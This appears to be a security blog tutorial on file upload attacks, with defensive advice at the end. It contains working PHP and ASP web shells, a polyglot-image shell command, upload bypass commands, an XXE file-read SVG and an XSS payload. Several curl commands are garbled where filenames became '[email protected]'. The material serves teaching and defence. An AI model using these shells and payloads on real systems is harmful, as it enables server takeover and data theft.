Mastering File Upload Attacks: From Bypass to RCE – A Comprehensive Guide + Video

Listen to this Post

Featured Image

Introduction:

File upload functionalities are ubiquitous in modern web applications—from profile pictures to document sharing. However, insecure implementations can turn them into a critical gateway for attackers. By exploiting weak validation, an adversary can upload malicious files, leading to remote code execution (RCE), data breaches, or full server compromise. This article dissects file upload attack techniques, provides step-by-step exploitation guides, and outlines robust defenses, drawing from real-world modules like HackTheBox’s “File Upload Attacks.”

Learning Objectives:

  • Understand the core validation mechanisms (client-side, server-side, blacklist, whitelist, MIME, magic bytes).
  • Learn how to bypass each control using practical tools and commands.
  • Exploit file upload flaws to achieve RCE and recommend effective mitigations.

You Should Know:

1. Understanding File Upload Validation Mechanisms

File upload security relies on multiple layers of checks. Client-side validation (JavaScript) is trivial to bypass. Server-side validation includes:
– Extension blacklisting (deny .php, .exe)
– Extension whitelisting (allow only .jpg, .png)
– MIME type checking (Content-Type header)
– Content validation (magic bytes / file signatures)

Example: A PHP web shell named `shell.php` might be blocked, but `shell.php5` or `shell.phtml` may pass a poor blacklist.

2. Bypassing Client-Side Validation

Client-side checks are performed in the browser and can be easily circumvented.

Step-by-step guide:

1. Intercept with Burp Suite:

  • Configure your browser to use Burp as a proxy.
  • Attempt to upload a legitimate file (e.g., test.jpg).
  • In Burp’s Proxy tab, capture the request.

2. Modify the request:

  • Change the filename from `test.jpg` to shell.php.
  • Adjust the `Content-Type` if needed (e.g., image/jpeg).
  1. Forward the request and check if the file is accepted.

Alternative with cURL:

curl -F "[email protected];type=image/jpeg" http://target.com/upload

If the server only checks client-side, the PHP file will be uploaded.

3. Bypassing Server-Side Blacklist Extensions

When the server blocks specific extensions (like .php), attackers can try:
– Alternative extensions: .php3, .php4, .php5, .phtml, `.phar`
– Case manipulation: .pHp, `.PhP` (if server uses case-sensitive checks)
– Double extensions: `shell.php.jpg` (if server only checks the last part)
– Adding trailing characters: `shell.php.` (Windows may strip the dot)

Step-by-step test:

1. Create a simple PHP info file:

<?php phpinfo(); ?>

Save as `shell.php5`.

2. Upload using a form or cURL:

curl -F "[email protected]" http://target.com/upload

3. If successful, access the file at `http://target.com/uploads/shell.php5` to verify execution.

Blacklist bypass via misconfiguration:

Some servers use a regex that only blocks exact matches. Try shell.php.jpg—if the server saves it as `shell.php.jpg` but the web server processes `.php` first, it may still execute.

  1. Bypassing Whitelist Extensions via MIME Type and Magic Bytes
    Whitelists allow only specific extensions (e.g., .jpg). Attackers can:

– Spoof MIME type: Send `Content-Type: image/jpeg` while uploading a PHP file.
– Embed PHP code within a valid image (polyglot) to bypass content checks.

Creating a polyglot image with embedded PHP:

Using `exiftool` to add PHP code to image metadata:

exiftool -Comment="<?php system($_GET['cmd']); ?>" image.jpg -o malicious.jpg

Or manually edit hex bytes: keep the file signature (e.g., `FF D8 FF E0` for JPEG) and append PHP code at the end.

Step-by-step upload:

1. Prepare `malicious.jpg` containing PHP payload.

  1. Upload with cURL, ensuring MIME type is image/jpeg:
    curl -F "[email protected];type=image/jpeg" http://target.com/upload
    
  2. If the server checks only MIME and magic bytes, the file is accepted. Access it and append `?cmd=id` to execute commands.

  3. Exploiting File Upload for Remote Code Execution (RCE)
    Once a malicious file is uploaded, the goal is to execute it. Common scenarios:

– Direct access: If the upload directory is web-accessible, navigate to the file.
– Path traversal: Overwrite critical files (e.g., ../../../../var/www/html/shell.php).
– Race conditions: Upload and request simultaneously to beat deletion routines.

Web shell example (PHP):

<?php system($_GET['cmd']); ?>

Save as `cmd.php`. After upload, visit:

http://target.com/uploads/cmd.php?cmd=ls -la

Windows environment: Use ASP or ASPX shells if the server supports it.

<% response.write(server.createobject("WScript.Shell").exec("cmd /c " & request.querystring("cmd")).stdout.readall) %>

6. Advanced Attacks: XXE, XSS, and ImageTragick

File uploads can also lead to:

  • XXE (XML External Entity): Upload a malicious SVG with embedded XML to read local files.
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <svg>&xxe;</svg>
    
  • Stored XSS: Upload an HTML file containing <script>alert(1)</script>; if the server serves it with text/html, the script executes.
  • ImageTragick: Exploit ImageMagick vulnerabilities (e.g., CVE-2016–3714) by crafting a malicious image that executes commands when processed.

7. Mitigation Strategies

To prevent file upload attacks:

  • Use a whitelist of allowed extensions (e.g., .jpg, .png, .pdf).
  • Validate MIME type and file content (magic bytes) server-side.
  • Store files outside the webroot and serve them via a script (e.g., download.php?id=123).
  • Rename files randomly to prevent direct access and path traversal.
  • Disable execution permissions on upload directories (e.g., `.htaccess` with php_flag engine off).
  • Scan files with antivirus or sandbox before storage.
  • Implement Content Security Policy (CSP) to mitigate XSS.

Example `.htaccess` for upload directory:

<FilesMatch ".">
ForceType application/octet-stream
Header set Content-Disposition attachment
</FilesMatch>

What Undercode Say:

  • Key Takeaway 1: File upload vulnerabilities are a high-risk entry point because they can directly lead to remote code execution. Every layer of validation must be scrutinized—client-side controls are merely a convenience, not a security measure.
  • Key Takeaway 2: A defense-in-depth approach is essential: whitelist extensions, validate content, rename files, and store them outside the web root. Relying on a single check (like MIME type) is a recipe for compromise.

Analysis: The techniques demonstrated—from simple extension fuzzing to polyglot images—highlight the creativity required to bypass modern filters. Security professionals must adopt an attacker mindset and test file upload forms with all possible permutations. Moreover, developers should be trained to understand that file upload is not just a feature but a potential weapon.

Prediction:

As file upload attacks grow more sophisticated, we will see increased use of AI-generated polyglot files that evade signature-based detection. Cloud storage integrations (e.g., S3 buckets) will introduce new misconfigurations, such as public write permissions or lack of server-side validation. Additionally, the rise of serverless architectures may shift the attack surface to API endpoints, where file uploads are processed by third-party services. Expect automated scanning tools to evolve, and defenders to adopt machine learning for anomaly detection in uploaded content. The cat-and-mouse game continues.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Mohamed Soliman – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky